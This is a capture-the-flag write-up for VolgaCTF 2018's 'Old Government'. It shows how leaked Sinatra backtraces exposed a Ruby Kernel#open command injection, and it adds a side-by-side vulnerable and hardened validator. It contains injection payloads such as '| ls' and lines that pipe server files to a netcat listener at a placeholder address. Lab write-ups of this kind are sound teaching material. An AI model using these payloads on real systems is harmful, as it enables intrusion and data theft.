Tags: netcat command remote execution ruby 

---
title: volgactf 2018 - Old Government
author: onionpsy
categories:
- hacking
---

We started by checking the link in the header and saw that an `id` is passed in the URL with the id of the page: `page?id=36`. After some tries we found that we could crash the application by passing `id` as an array, like this: `page?id[]=36`.

```text
NoMethodError at /page
undefined method `to_i' for ["36"]:Array
Did you mean?  to_s
               to_a
               to_h
```

This is Sinatra's development-mode exception page, so the website is powered by Sinatra, a Ruby web framework. Besides the framework, the page leaks the source around each frame of the backtrace.

From the backtrace we could see parts of the code.

### articles.erb
```ruby
# articles.erb, as shown in the backtrace. @id comes straight from params[:id],
# so `id[]=36` makes it an Array, and Array has no to_i: that is the crash above.
case @id.to_i
when 2
  erb :page2
when 5
  erb :page5
when 18
  erb :page18
when 23
# (remaining branches cut off in the backtrace)
```

### app.rb
```ruby
# app.rb, as shown in the backtrace. The first three lines are the tail of the
# preceding route.
  headers "Server" => ""   # blanks the Server header; the exception page gives the stack away anyway
  erb :index
end

get '/page' do
  @id = params[:id]        # unvalidated: Rack parses `id[]=36` into an Array
  headers "Server" => ""
  erb :articles
end

post '/page' do
  @id = params[:id]        # same for POST, which is how the form on page 18 is submitted
  headers "Server" => ""
  erb :articles
end
```

After a few tries on the pages, we found that the page with id 18 has a form with two fields. One expects a valid URL (`site`) and the other is an optional description (`description`). We used the `id[]=36` trick once again, but via POST this time. This gave us more information about the code. The most interesting part is this function:

```ruby
def siteValidator(site)
  begin
    # Kernel#open: if `site` starts with "|", the rest is run as a shell command
    r = open(site, :allow_redirections => :all)
    (...)
```

Judging by the name, this is run on the `site` field of the POST request. As the [OWASP - Ruby on Rails Cheatsheet](https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet) points out, Ruby's `Kernel#open` runs its argument as a shell command when the string starts with a pipe (`|`), so passing user input to `open` is command injection. The `:allow_redirections` option shows that `open-uri` is in use, but that does not help: the open-uri wrapper only handles strings that look like URLs and hands everything else, including `| cmd`, to the original `Kernel#open`.
After some tries we confirmed that it works. Since the page only tells us whether the validator succeeded, we get a blind oracle:
* `site=| ls` shows `validated` (the command exists, so `open` returns an `IO`)
* `site=| aaaa` shows `error` (no such command, so `open` raises and the validator reports an error)
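To make the root cause concrete, here is an added example (not code from the challenge or from the original writeup) that puts a minimal version of the vulnerable validator next to a hardened one. The names `vulnerable_site_validator`, `safe_site_validator` and `ALLOWED_SCHEMES` are mine. open-uri and its `:allow_redirections` option are left out so the snippet runs offline; that does not change the injection, since open-uri only ever handled URL-looking strings and passed everything else to the original `Kernel#open`.

```ruby
require 'uri'

# Vulnerable pattern, mirroring the challenge's siteValidator: the user-supplied
# string goes straight to Kernel#open. A leading "|" turns the call into
# IO.popen, so "| ls" runs ls and hands back its stdout as an IO.
# (Hypothetical name; the challenge's own function is siteValidator.)
def vulnerable_site_validator(site)
  io = open(site)   # "| echo hi" -> spawns `echo hi`, returns IO
  io.read.strip     # "| aaaa"    -> Errno::ENOENT (no such command) -> 'error'
rescue StandardError
  'error'
ensure
  io&.close
end

# Hardened version: parse first, decide on the parsed object, and never hand
# the raw string to open. URI.parse rejects "| ls" outright (not a URI), and
# the scheme allow-list also blocks file:// and other non-web schemes.
ALLOWED_SCHEMES = %w[http https].freeze

def safe_site_validator(site)
  uri = URI.parse(site)
  return 'error' unless ALLOWED_SCHEMES.include?(uri.scheme)
  return 'error' if uri.host.nil? || uri.host.empty?
  # Fetching, if needed, would go through URI.open(uri) or Net::HTTP with the
  # URI object, which cannot be read as a pipe command. Omitted here so the
  # example stays offline.
  'validated'
rescue URI::InvalidURIError
  'error'
end

if $PROGRAM_NAME == __FILE__
  # Constructed inputs: the two probes from the writeup plus a real URL and a
  # non-web scheme, run through both validators.
  ['| echo hello', '| aaaa', 'http://example.com/', 'file:///etc/passwd'].each do |site|
    puts "#{site.inspect}: vulnerable=#{vulnerable_site_validator(site)} safe=#{safe_site_validator(site)}"
  end
end
```

The vulnerable function reproduces the oracle exactly: an existing command makes `open` succeed, a missing one makes it raise, and the caller only ever sees `validated` or `error`. The fix is not a blacklist on `|`; it is never letting an attacker-controlled string reach `Kernel#open` at all.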

Because the page never shows command output, we exfiltrated it instead: `netcat` was present on the server, so we piped each command's output to a netcat listener we control, using this syntax: `site=| <command> | netcat <ip> <port>`

After listing a few directories this way, we found the flag file:
`site=| cat ../../flag | netcat <ip> <port>`

Done!

Original writeup (https://github.com/phi0/phi0.github.io/blob/master/_posts/2018-03-24-volgactf-2018%20-%20Old%20Government.md).